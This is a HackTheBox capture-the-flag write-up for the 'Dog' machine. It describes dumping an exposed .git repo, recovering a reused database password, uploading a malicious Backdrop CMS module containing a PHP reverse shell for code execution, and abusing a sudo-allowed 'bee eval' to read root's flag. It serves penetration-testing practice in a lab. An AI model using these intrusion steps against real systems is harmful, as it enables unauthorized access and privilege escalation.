HackTheBox -Dog
Dog is running Backdrop CMS. We found a publicly accessible .git repository, recovered credentials from the site files, used those credentials to log in as an admin and upload a malicious Backdrop module to achieve authenticated RCE. From a webshell (www-data) we pivoted to a user account (johncusack) via password reuse and then abused a sudo-exposed binary to read root.txt.
Port Scanning
We start off with an nmap scan on the target.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8=
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
| 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-title: Home | Dog
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the scan we get port 22 which is running ssh and port 80 that is running an apache web server.
Web Enumeration
From the nmap scan we got that the website has a `robots.txt file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
curl http://10.10.11.58/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html
#
# For syntax checking, see:
# http://www.robotstxt.org/checker.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout
From the scan we also identified the CMS being used.We can use this to search for the exploit later on.
1
http-generator: Backdrop CMS 1 (https://backdropcms.org)
The scan also identified a git repository 10.10.11.58:80/.git/
1
2
3
4
5
6
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
To get a better understanding and to view the websites source code we shall use git-dumper to download the repository.
1
git-dumper http://10.10.11.58/.git Dog.htb_Website
The directory structure:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
drwxrwxr-x 7 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 .git
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 18092 Mar 9 18:28 LICENSE.txt
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 5285 Mar 9 18:28 README.md
drwxrwxr-x 9 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 core
drwxrwxr-x 7 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 files
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 578 Mar 9 18:28 index.php
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 layouts
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 1198 Mar 9 18:28 robots.txt
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 21732 Mar 9 18:28 settings.php
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 sites
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 themes
Before viewing the source code lets visit the site.
now that we know the username format lets see if we have some in the source code
1
2
3
4
5
6
7
8
grep -Ri dog.htb .
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases.
reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
With a username tiffany@dog.htb lets get the password.
Since the password would be contained in the database i searched for database and got that they are using mysql then used grep to shorten the search.
1
2
3
4
5
6
7
grep -Ri mysql .
./README.md:- MySQL 5.0.15 or higher with PDO enabled
./README.md:1. Create a new database, username, and password for Backdrop to use in MySQL.
grep: ./.git/index: binary file matches
./settings.php:$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
Just for confirmation lets view the file ./settings.php
1
2
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
Since this was the only password and will exploiting password reuse :)
So far we have this valid credentials: username : tiffany@dog.htb password : BackDropJ2024DS2024
Lets logging in the website
Web Exploitation
We get access to the admin dashboard, very nice :)
The Backdrop CMS! confirms that its using the backdrop content management system that we got in our scan, lets search for an exploit.
The Python script exploits a vulnerability in Backdrop CMS 1.27.1, allowing an authenticated user (someone with admin or privileged access) to upload a malicious module that grants Remote Command Execution (RCE). This will work for us since we are logged in as admin.
Here is how the Exploit Works
- Creates a Malicious Module The script generates a fake Backdrop CMS module (shell). This module includes:
shell.info: Metadata required for Backdrop CMS to recognize it as a valid module.shell.php: A simple web shell that executes system commands.
- Compresses the Malicious Module into a ZIP file The script packages the shell.info and shell.php into shell.zip, making it ready for upload.
Will try doing this manually instead of just running the script.
- Create the
shell.infofile1 2 3 4 5 6 7 8 9 10 11 12
type = module name = Block description = remote code execution vulnability exploit. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block project = backdrop version = 1.27.1 timestamp = 1709862662
- Create a
shell.phpfile but for this will be using thepentestmonkeyphp reverse shell php script. - Compresses the Malicious Module - for this will be using the command :
tar -czvf shell.tar.gz shell/ - Now lets upload the module. Visit this url
http://10.10.11.58/?q=admin/installer/manual - we run
ncin our machine and wait for a shell hopefully.
We successfully get a shell but as user www-data thus we switch to user johncusack using the password BackDropJ2024DS2024.
1
2
3
4
5
6
johncusack@dog:~$ ls -l user.txt
ls -l user.txt
-rw-r----- 1 root johncusack 33 Mar 9 17:11 user.txt
johncusack@dog:~$
Privilege Escalation
I ran privilege escalation enumeration .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-xr-x 1 root root 467K Feb 11 14:09 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 67K Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 44K Feb 6 2024 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 87K Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 84K Feb 6 2024 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 39K Apr 9 2024 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 52K Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Apr 9 2024 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 67K Feb 6 2024 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 163K Apr 4 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
Interesting findings included SUID binaries and sudo capabilities.
The key was the ability to use /usr/local/bin/bee (invoked via sudo) to evaluate code as root.
Example of exploitation:
1
2
3
4
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "echo file_get_contents('/root/root.txt');"
b123db2203.......................
johncusack@dog:/var/www/html$